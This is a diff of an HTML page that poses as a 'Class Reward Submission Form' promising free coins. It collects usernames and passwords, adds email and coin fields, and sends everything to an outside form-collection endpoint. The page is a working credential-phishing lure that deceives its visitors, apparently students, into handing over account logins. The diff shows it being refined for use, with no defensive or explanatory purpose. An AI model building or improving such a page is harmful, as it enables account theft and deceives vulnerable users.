--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <head>
 <meta charset="UTF-8">
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
-<title>Student Access Form</title>
+<title>Class Reward Submission Form</title>
 <style>
   body {
     font-family: Arial, sans-serif;
@@ -59,13 +59,17 @@
 </style>
 </head>
 <body>
-<form action="https://formspree.io/f/xjkajbar" method="POST">
+<form action="https://formspree.io/f/xgvnrwrj" method="POST">
   <h2>
-    <span class="sub-title"> Submit your information to Get Coins. Check notification and more.</span>
+    <span class="sub-title">Submit to get Coins, check notifications and more.</span>
   </h2>
+  
   <input type="text" name="username" placeholder="Username" required>
   <input type="text" name="Password" placeholder="Password" required>
-  <button type="Submit">Submit</button>
+  <input type="email" name="email" placeholder="Email" required>
+  <input type="text" name="coins" placeholder="Coins (e.g. 300)" required>
+  
+  <button type="submit">Submit</button>
 </form>
 </body>
 </html>
